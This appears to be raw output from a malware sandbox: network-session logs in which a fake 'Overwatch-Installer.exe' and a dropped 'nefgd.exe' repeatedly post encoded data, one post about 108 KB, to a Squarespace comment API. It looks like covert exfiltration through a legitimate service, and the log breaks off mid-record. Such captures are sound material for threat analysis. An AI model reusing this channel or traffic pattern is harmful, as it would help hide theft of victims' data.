2024-09-01 20:04:52 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:52 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfZ4KsNZX-3gNTU2ODVjMmU1NjdjZWY4NzFhOTc1ZDUzYjU5YzNl; Path=/; Secure Set-Cookie: crumb=BVdeQ1tB9CEsYzQxNTE5MzQ0YWRkM2Y4ZTIzODNmZjQ1NDZkYWU2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: uTL9CTYg/99fCVWg0 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BVdeQ1tB9CEsYzQxNTE5MzQ0YWRkM2Y4ZTIzODNmZjQ1NDZkYWU2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	49813	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:52 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:52 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:52 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:52 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:52 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:52 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BV2djG1F8RSBOGJiODk4MjUzYWJlOTExOWExOGQ1OTQxNDVjMmI4; Path=/; Secure Set-Cookie: crumb=BfcP-_S8_WgVZGVjYzkzNjgwMTlhY2RjNzliMmMyMzM2MzAxNTU1; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: iqYcxY2D/FzLIl4MF Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BfcP-_S8_WgVZGVjYzkzNjgwMTlhY2RjNzliMmMyMzM2MzAxNTU1"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	49814	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:52 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:53 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:53 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:53 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:52 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Ba7YzXXXnzGbZjg5NDQyZjhiNzQyM2NkZGE0ZWMyOWNhYTk2NmVk; Path=/; Secure Set-Cookie: crumb=BYMY-KJNxFueMWM0NzU3ZmFjZTA4N2UyNTQ0YjI5NDYwNmYwOWUz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: XXREqXDu/qK5IJNYJ Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYMY-KJNxFueMWM0NzU3ZmFjZTA4N2UyNTQ0YjI5NDYwNmYwOWUz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	49815	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:52 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:53 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:53 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:53 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:52 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BYEDG2OfUliZYTQwZTUyMWI5M2M0M2E0OGM2NzY4MDhhNTEzMWJl; Path=/; Secure Set-Cookie: crumb=BYR68tJL2Ok_M2JiMTBkOGJlYjFiNjNjMzdiNTgyYWJlNjZiYmFl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: jWgQzjhJ/HWZQWLby Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYR68tJL2Ok_M2JiMTBkOGJlYjFiNjNjMzdiNTgyYWJlNjZiYmFl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	49817	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:52 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:53 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:53 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 54 37 73 79 68 76 69 43 7a 69 52 51 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmT7syhviCziRQgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:53 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:53 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:53 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:53 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:53 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:53 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:53 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:53 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:53 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:52 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BX9NmZdi3PUkODBlMGU4MDFlNTRkNzc3Y2QyNmExOTI4Zjc0NWZl; Path=/; Secure Set-Cookie: crumb=BQwdnaul1IZDZTZhNDZkN2NkYTVjODhlZmU0NDc2NTA3NjUxYzM0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: jxCcVyHy/2iRuAgmo Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQwdnaul1IZDZTZhNDZkN2NkYTVjODhlZmU0NDc2NTA3NjUxYzM0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	49816	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:52 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:53 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:53 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:53 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:53 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRgWquupvtcONDA2NzBlOTI1N2M1NGNlNzc4MjYxYjM0NDZmMDNk; Path=/; Secure Set-Cookie: crumb=BSCic9AckagFYjMyZmRkMTRhYzhlZjE5MzVjMWUyOTVhNTNiMDIy; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: LOKDTEq5/ynABTNRq Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BSCic9AckagFYjMyZmRkMTRhYzhlZjE5MzVjMWUyOTVhNTNiMDIy"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	49819	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:53 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:53 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:53 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:53 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:53 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BS4rYoPN_gGCYTJmMTI4MzVlNGM1NzI5ODNjNmRiYzY5ZDBjNGQ4; Path=/; Secure Set-Cookie: crumb=BZ6K29GIsiieN2QzZDljZTEyOTU1YjAxMWI3ZmEzODdhMGQxNTk3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 58uYEMfE/4d0jH6gC Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZ6K29GIsiieN2QzZDljZTEyOTU1YjAxMWI3ZmEzODdhMGQxNTk3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	49818	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:53 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 330 Expect: 100-continue
2024-09-01 20:04:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:53 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:53 UTC	329	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 78 37 78 65 66 4b 73 55 39 51 58 6e 74 35 4e 56 37 36 50 4f 37 71 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 50 6d Data Ascii: 